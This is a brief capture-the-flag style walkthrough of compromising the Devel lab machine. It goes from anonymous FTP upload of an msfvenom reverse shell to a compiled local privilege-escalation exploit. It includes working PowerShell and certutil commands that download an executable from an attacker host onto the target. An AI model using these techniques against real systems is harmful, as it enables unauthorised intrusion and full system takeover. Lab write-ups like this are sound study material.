I’m skipping Blue since its the same as Legacy and moving to Devel.
For exploitation used the following.
From the nmap scan found out that anonymous login is enabled for FTP
when logged in found out that anonymous user has the rights to push files to the webserver. Created a reverse shell using msfvenom and uploaded it
from the browser went to the usl with netcat listening. Got a low level windows shell. from systeminfo found out that it was vulnerable build.
searched for the exploit on google, found one. Searched through searchsploit to find the same one
compiled the exploit using i686-w64-mingw32-gcc as instructed. if you don’t have it installed. You can install it by typing
apt install mingw-w64
after compiling the exploit use SimpleHTTPServer for hosting the exploit, which can be downloaded to the windows box.
There are two ways to download this file to the windows box using command line
- Using Powershell
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.22/exploit.exe', 'c:\Users\Public\Downloads\exploit.exe')"
2. Using Certutil
certutil.exe -urlcache -split -f http://10.10.14.22/exploit.exe exploitee.exe
after downloading the exploit run it in the command line. we have NT AUTHORITY.